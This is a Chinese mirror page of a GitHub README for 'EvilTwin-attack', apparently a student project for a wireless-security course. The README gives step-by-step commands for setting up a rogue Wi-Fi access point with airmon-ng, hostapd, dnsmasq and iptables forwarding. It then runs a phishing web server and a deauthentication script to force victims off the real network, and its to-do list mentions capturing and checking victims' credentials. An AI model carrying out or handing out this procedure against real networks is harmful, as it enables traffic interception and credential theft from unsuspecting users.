无人机蜂群>> EvilTwin-attack>> 返回
项目作者: josip8

项目描述 :
Security of wireless networks project
高级语言: HTML
项目地址: git://github.com/josip8/EvilTwin-attack.git
创建时间: 2019-02-19T12:25:01Z
项目社区:https://github.com/josip8/EvilTwin-attack
开源协议:MIT License
下载


Evil Twin Attack

Short info

‘Ewil Twin Attack’ is college project for Security of wireless networks course.
Some of the technologies used in this project are:

  • Python, Scapy
  • Hostapd, Dnsmasq
  • Express.js
  • HTML, CSS, JavaScript
  • Linux (Kali)

Demo

Setting up the attack:

Check out your interfaces

  1. $ iwconfig

Kill processes that could cause trouble

  1. $ airmon-ng check kill

Put interface in monitor mode

  1. $ airmon-ng start <interface>

Modify hostapd.conf parameters and then start access point

  1. $ hostapd hostapd.conf

Assign the network Gateway and netmask to the interface and add the routing table

  1. $ ifconfig <interface> up 192.168.1.1 netmask 255.255.255.0
  2. $ route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

Modify dnsmasq.conf parameters and then start dnsmasq

  1. $ dnsmasq -C dnsmasq.conf -d

Provide your victim with internet access.
Forward traffic from one interface to another and enable traffic forwarding

  1. $ iptables --table nat --append POSTROUTING --out-interface <out-interface> -j MASQUERADE
  2. $ iptables --append FORWARD --in-interface <in-interface> -j ACCEPT
  3. $ echo 1 > /proc/sys/net/ipv4/ip_forward

Install dependencies, create .env file with PORT=80, and run the server

  1. $ npm install
  2. $ npm start

If you want force connection run deauth.py (disconnect victim from real access point)

  1. $ python deauth.py

To-do

  • Automating script for running and configuring hostapd, dnsmasq and traffic forwarding
  • Better and more convincing way of dealing with victim if credentials are true of false
  • Find new way of checking if credentials are correct (response size is not reliable)